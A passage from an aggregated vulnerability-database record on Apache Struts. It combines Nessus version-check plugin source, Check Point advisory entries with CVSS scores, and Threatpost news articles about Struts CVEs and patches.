Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nos = get_kb_item_or_exit('Host/OS');\nwin_local = 'windows' >< tolower(os);\n\napp_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [{'min_version':'2.0.0', 'fixed_version':'2.5.26'}];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:11", "description": "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by multiple unspecified vulnerabilities related to dynamic method invocation (DMI) in the bundled version of Apache Struts.", "cvss3": {}, "published": "2015-05-08T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor 3.0.x < 3.0.5 Apache Struts DMI Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4316"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:mysql:enterprise_monitor", "cpe:/a:apache:struts"], "id": "MYSQL_ENTERPRISE_MONITOR_3_0_5.NASL", "href": "https://www.tenable.com/plugins/nessus/83297", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83297);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-4316\");\n script_bugtraq_id(62587);\n\n script_name(english:\"MySQL Enterprise Monitor 3.0.x < 3.0.5 Apache Struts DMI Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\nrunning on the remote host is affected by multiple unspecified\nvulnerabilities related to dynamic method invocation (DMI) in the\nbundled version of Apache Struts.\");\n # http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?17c46362\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-019.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor 3.0.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/09/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:enterprise_monitor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nfix = \"3.0.5\";\nport = get_http_port(default:18443);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nif (version =~ \"^3\\.0($|[^0-9])\" && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-13T16:02:28", "description": "The version of Apache Struts installed on the remote host is prior to 2.5.26. It is, therefore, affected by a vulnerability as referenced in the S2-061 advisory.\n\n - Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. (CVE-2020-17530)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-07-06T00:00:00", "type": "nessus", "title": "Apache Struts 2.0.0 < 2.5.26 Possible Remote Code Execution vulnerability (S2-061)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-17530"], "modified": "2023-08-09T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_S2-061.NASL", "href": "https://www.tenable.com/plugins/nessus/151425", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151425);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/08/09\");\n\n script_cve_id(\"CVE-2020-17530\");\n script_xref(name:\"IAVA\", value:\"2020-A-0565-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Apache Struts 2.0.0 < 2.5.26 Possible Remote Code Execution vulnerability (S2-061)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by Possible Remote Code Execution vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is prior to 2.5.26. It is, therefore, affected by a\nvulnerability as referenced in the S2-061 advisory.\n\n - Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code\n execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. (CVE-2020-17530)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-061\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.26 or later. Alternatively, apply the workaround as referenced in in the vendor's\nsecurity bulletin\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17530\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar os = get_kb_item_or_exit('Host/OS');\nvar win_local = ('windows' >< tolower(os));\n\nvar app_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.5.25', 'fixed_version' : '2.5.26' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:12:45", "description": "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host may be affected by a cross-site request forgery vulnerability due to the token generator failing to adequately randomize the token values. A remote attacker can exploit this by extracting a token from a form and then predicting the next token value that will be used to secure form submissions. By convincing a victim to visit a specially crafted form, the attacker can then use the predicted token value to force an action for a logged in user.\n\nNote that this vulnerability can only be exploited when the <s:token/> tag is used within a form.", "cvss3": {}, "published": "2015-05-08T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor < 2.3.20 Apache Struts Predictable Token XSRF", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7809"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:mysql:enterprise_monitor", "cpe:/a:apache:struts"], "id": "MYSQL_ENTERPRISE_MONITOR_2_3_20.NASL", "href": "https://www.tenable.com/plugins/nessus/83294", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83294);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7809\");\n script_bugtraq_id(71548);\n\n script_name(english:\"MySQL Enterprise Monitor < 2.3.20 Apache Struts Predictable Token XSRF\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a\ncross-site request forgery vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\nrunning on the remote host may be affected by a cross-site request\nforgery vulnerability due to the token generator failing to adequately\nrandomize the token values. A remote attacker can exploit this by\nextracting a token from a form and then predicting the next token\nvalue that will be used to secure form submissions. By convincing a\nvictim to visit a specially crafted form, the attacker can then use\nthe predicted token value to force an action for a logged in user.\n\nNote that this vulnerability can only be exploited when the <s:token/>\ntag is used within a form.\");\n # http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56618dc1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-023.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.apache.org/jira/browse/WW-4423\");\n\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MySQL Enterprise Monitor 2.3.20 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/08\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:enterprise_monitor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 18080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nfix = \"2.3.20\";\nport = get_http_port(default:18080);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n set_kb_item(name:'www/'+port+'/XSRF', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:54:03", "description": "A security bypass vulnerability exists in Apache Struts. The vulnerability is due to inadequate validation of data processed by ParametersInterceptor allowing for manipulation of the ClassLoader. A remote attacker could exploit this vulnerability by providing a class parameter in a request.", "cvss3": {}, "published": "2014-04-25T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts ParametersInterceptor ClassLoader Security Bypass (CVE-2014-0094; CVE-2014-0112; CVE-2014-0113; CVE-2014-0114)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0114"], "modified": "2019-06-04T00:00:00", "id": "CPAI-2014-1480", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T12:14:33", "description": "The url/a tags resolve every parameter passed to them, allowing arbitrary OGNL expressions encoded into the URL to be evaluated bypassing both Struts and OGNL library protections. Successful exploitation will allow an attacker to execute arbitrary commands in the context of the server.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-06-04T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts URL and Anchor tag includeParams OGNL Command Execution (CVE-2013-1966; CVE-2013-2115)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2015-11-03T00:00:00", "id": "CPAI-2013-1859", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:33:31", "description": "A remote code execution vulnerability exists in the Apache Struts2 using Freemarker template engine. An attacker could exploit this vulnerability by sending crafted requests to the target host. Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-08T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts2 Freemarker Remote Code Execution (CVE-2017-12611)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611"], "modified": "2017-09-08T00:00:00", "id": "CPAI-2017-0747", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:27:26", "description": "A remote code execution vulnerability exists in Apache. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-15T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts2 Freemarker Remote Code Execution (CVE-2017-12611) - Ver2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611"], "modified": "2018-07-31T00:00:00", "id": "CPAI-2018-0779", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T12:16:13", "description": "A Cross-Site Scripting vulnerability has been reported in Apache Struts. The vulnerabilities are due to unsanitized parameters in various automatically generated error pages. A remote attacker can exploit these vulnerabilities by enticing a victim to follow a specially crafted link. Successful exploitation could result in attacker-controlled script execution in the browser context of the target server.", "cvss3": {}, "published": "2013-10-13T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts XWork Error Page Multiple Cross-Site Scripting (CVE-2011-1772)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1772"], "modified": "2013-10-13T00:00:00", "id": "CPAI-2013-2969", "href": "", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-02-16T19:36:00", "description": "A remote code execution vulnerability exists in Apache Struts. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-21T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts Remote Code Execution (CVE-2020-17530)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2020-12-21T00:00:00", "id": "CPAI-2020-1331", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T23:00:06", "description": "Developers behind the Apache Struts framework have released an update that fixes two vulnerabilities.\n\nCreators of the open-source web application framework are encouraging users to upgrade to Struts 2.3.15.2 immediately.\n\nOne of the fixes addresses [an issue](<http://struts.apache.org/release/2.3.x/docs/s2-019.html>) (CVE-2013-4316) in the Dynamic Method Invocation (DMI) feature that was previously thought to break users\u2019 applications if relied on too heavily. It was previously enabled by default and flashed a warning that users should switch it off if possible. Now the feature is disabled by default \u2013 or if users want to employ a workaround, they can switch struts.enable.DynamicMethodInvocation to false in struts.xml.\n\nThe second fix involves a broken access control [vulnerability issue](<http://struts.apache.org/release/2.3.x/docs/s2-018.html>) (CVE-2013-4310) with Struts 2\u2019s action mapping mechanism. A parameter in the mechanism was set up to support the prefix \u201caction:\u201d to make sure navigational information can be attached to buttons in forms. Unfortunately \u201cunder certain conditions\u201d attackers could have used this feature to bypass security constraints. The update fixes the mechanism and restricts security constraints. Like the DMI issue, there\u2019s a workaround, writing your own ActionMapper and, dropping support for \u201caction:\u201d\n\nPart of the Apache Software Foundation, Struts is used by developers to build Java- based web apps. Those interested in learning more about the fixes can head to Apache\u2019s [version notes](<http://struts.apache.org/release/2.3.x/docs/version-notes-23152.html>) on Struts 2.3.15.2 and download what Apache is calling the \u201cbest available\u201d version of the framework [on its site](<http://struts.apache.org/download.cgi#struts23152>).\n", "cvss3": {}, "published": "2013-09-23T13:03:17", "type": "threatpost", "title": "Apache Upgrade Repairs Struts, Fixes Two Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-4310", "CVE-2013-4316"], "modified": "2013-09-27T14:31:38", "id": "THREATPOST:F3CCF4A5ECFE4B0E862CEE7C1076E03E", "href": "https://threatpost.com/apache-upgrade-repairs-struts-fixes-two-vulnerabilities/102385/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:37", "description": "VMware has patched several serious security vulnerabilities in its vCenter Operations Center Management suite, one of which could lead to remote code execution on vulnerable machines.\n\nAll of the vulnerabilities that the company [patched](<http://www.vmware.com/security/advisories/VMSA-2014-0007.html>) lie in the Apache Struts Java application framework, and the most serious of them is CVE-2014-0112, which allows an attacker to run arbitrary code.\n\n\u201cParametersInterceptor in Apache Struts before 2.3.16.2 does not properly restrict access to the getClass method, which allows remote attackers to \u201cmanipulate\u201d the ClassLoader and execute arbitrary code via a crafted request,\u201d the vulnerability [description](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0112>) says.\n\nApache [fixed](<https://struts.apache.org/announce.html>) the vulnerability in a new release of Struts back in April. The issue was created because of an incomplete patch for a previous vulnerability in Struts. The three Struts vulnerabilities all are addressed in the release of version 5.8.2 of VMware vCOPS, the company said.\n\nThe other two, less serious vulnerabilities fixed in the new version of vCOPS are CVE-2014-0050 and CVE-2014-0094. The first flaw is problem that could lead to a denial-of-service condition if exploited by a remote attacker.\n\n\u201cMultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop\u2019s intended exit conditions,\u201d the [advisory](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0050>) says.\n\nCVE-2014-0094 is also remotely exploitable by an unauthenticated attacker, who could manipulate a component of Struts.\n\n\u201cThe ParametersInterceptor in Apache Struts before 2.3.16.1 allows remote attackers to \u201cmanipulate\u201d the ClassLoader via the class parameter, which is passed to the getClass method,\u201d the [advisory](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0094>) says.\n", "cvss3": {}, "published": "2014-06-25T13:59:49", "type": "threatpost", "title": "VMware Patches Apache Struts Flaws in vCOPS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2014-06-25T19:22:45", "id": "THREATPOST:40B4CEF304ADBCA0734F292661E7810B", "href": "https://threatpost.com/vmware-patches-apache-struts-flaws-in-vcops/106858/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-10-14T22:21:14", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source coding framework and library for enterprise developers popular with developers and companies when creating Java-based applications. Both the exploitable vulnerabilities in question were fixed last November. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>) \nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week ](<https://github.com/cellanu/cve-2019-0230>)raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends a malicious Object-Graph Navigation Language (OGNL) expressions that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is a Java language that can let attackers access data objects, and then use them to create and inject server-side code.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing & Analysis Center at the Center for Internet Security.\n\nWhile the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). The vulnerability affects the write permissions of file directories that could lead to conditions ripe for a DoS attack.\n\nAccording to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Strut\u2019s Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an 